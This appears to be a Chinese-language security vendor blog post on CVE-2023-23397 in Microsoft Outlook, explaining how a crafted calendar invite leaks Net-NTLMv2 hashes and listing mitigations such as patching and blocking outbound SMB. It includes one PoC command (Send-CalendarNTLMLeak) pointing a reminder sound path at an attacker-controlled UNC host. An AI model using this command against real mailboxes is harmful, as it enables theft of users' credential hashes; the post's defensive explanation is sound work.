Outlook（CVE-2023-23397）的檢測復現(xiàn)與修復

前言

安盟信息實驗室安全研究員最近發(fā)現(xiàn)CVE-2023-23397(outlook漏洞)在野利用，由于outlook在企業(yè)中廣泛使用，護網(wǎng)在即，為避免漏洞利用造成的危害，他們復現(xiàn)了該漏洞。

漏洞描述

Microsoft Office Outlook是微軟辦公軟件套裝的組件之一，可以用來收發(fā)電子郵件、管理聯(lián)系人信息、安排日程等功能。

CVE-2023-23397是Microsoft Outlook欺騙漏洞，可導致身份驗證繞過，未經(jīng)身份驗證的攻擊者可以通過向受影響的系統(tǒng)發(fā)送特制電子郵件來利用該漏洞獲取用戶的Net-NTLMv2哈希。

漏洞原理

攻擊者向受害者發(fā)送一條帶有MAPI（Messaging Application Programming Interface）屬性的消息，其中UNC路徑為攻擊者控制的服務器上的SMB（TCP 445端口）。攻擊者發(fā)送帶有惡意日歷邀請的郵件，來使“PidLidReminderFileParameter”（提醒的自定義警報聲音選項）觸發(fā)易受攻擊的 API 端點 PlayReminderSound。部分Poc代碼如下：

漏洞利用

Send-CalendarNTLMLeak -recipient "收件郵箱地址XXXX@XX.COM" -remotefilepath "\\攻擊機IP\d.wav" -meetingsubject "會議主題" -meetingbody "會議內(nèi)容"

觸發(fā)UNC_PATH成功抓到HASH：

緩解措施

1.立即應用供應商補丁。微軟發(fā)布了一個補丁，作為其 2023 年 3 月月度安全更新的一部分。

2.阻止 TCP 445/SMB 從您的網(wǎng)絡出站。這將阻止將 NTLM 身份驗證消息發(fā)送到遠程文件共享。如果無法做到這一點，我們建議監(jiān)控通過端口 445 的出站流量以查找未知的外部 IP 地址，然后識別并阻止它們。

3.客戶可以禁用 WebClient 服務。請注意，這將阻止所有 WebDAV 連接，包括內(nèi)聯(lián)網(wǎng)。

4.將用戶添加到受保護的用戶安全組。這會阻止使用 NTLM 作為身份驗證機制，但請注意，這可能會影響在您的環(huán)境中依賴 NTLM 的應用程序。

5.在客戶端和服務器上強制執(zhí)行 SMB 簽名以防止中繼攻擊。

其他研究人員指出，禁用Outlook 中的“顯示提醒”設置可以防止 NTLM 憑據(jù)泄露。

安盟信息依托豐富的實踐經(jīng)驗與雄厚技術(shù)研發(fā)實力，積極發(fā)揮自身檢測預警的優(yōu)勢，全面掌握漏洞動態(tài)，為各行業(yè)客戶提供全方位的網(wǎng)絡安全解決方案，快速提升客戶整體網(wǎng)絡安全性，如有漏洞檢測與應急需求，請及時聯(lián)系我們。安盟信息靈犀實驗室可以提供完整的解決方案與檢測腳本，全方位為您保駕護航！